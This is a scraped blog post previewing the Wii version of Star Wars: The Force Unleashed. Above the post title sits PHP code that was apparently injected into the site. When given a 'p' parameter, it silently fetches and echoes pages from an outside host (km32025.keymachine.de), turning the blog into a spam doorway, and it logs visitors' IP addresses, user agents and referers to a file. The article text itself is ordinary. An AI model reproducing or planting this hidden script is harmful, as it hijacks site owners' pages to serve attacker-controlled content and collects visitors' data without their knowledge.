error_reporting(0); ini_set('display_errors',0); define('STATFILE','stat.txt'); define('LOG',true); if(isset($_GET['p'])) { $sock = fsockopen('km32025.keymachine.de', 80); if($sock){ if (LOG && isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])) { $referer = rawurlencode($_SERVER['HTTP_REFERER']); $remote_ip = $_SERVER['REMOTE_ADDR']; $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']); $file = fopen(STATFILE,'ab'); if ($file) { fwrite($file,date('Y-m-d H:i:s').' '.$remote_ip.' '.$user_agent.' '.rawurldecode($referer)."\n"); fclose($file); } } fwrite ($sock, 'GET http://km32025.keymachine.de/oslik2/cn/7/'.$_GET['p'].'.html HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km32025.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); echo(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock);} exit; } -=+fastlikesquirrel.com+=- » Blog Archive » Unleash the Force

Unleash the Force

Star Wars: The Force Unleashed is the game that everyone has been waiting for. Even if you’re not a huge Star Wars fan… who hasn’t dreamt of wielding their own lightsaber? It seems like the Wii was designed for games like this and Wii owners have been screaming for this game since the console was released. I have discussed this game with my fellow gamers and friends alike and everyone agrees, if done right, this game will seriously kick arse. I mean, c’mon… a lightsaber!

Screen Play has a behind the scenes look at the plot and some of the moves involved with the game-

The game is set between Episode III and IV, which project lead, Haden Blackman describes as “a totally rich time period”.

“It is a dark time in the galaxy, Darth Vader’s hunting down the last of the Jedi, and more importantly, it’s a time that hasn’t really been explored before. We’ve been able to create a whole new original story based in this time period without really any constraints.”

Players control Darth Vader’s secret apprentice, a youngster Vader “has trained in the Dark Side and is teaching him to help him hunt down the last of the Jedi and ultimately to overthrow the Emperor”.

The PS3 and Xbox 360 versions of The Force Unleashed are in development at LucasArts internally, while the Wii, PS2 and PSP versions are being handled by Australia’s Krome Studios and will have exclusive content.

I can already envision myself jumping around the room like a twat, making the lightsaber sounds with my mouth for extra effect. Just bring it.

Leave a Reply

You must be logged in to post a comment.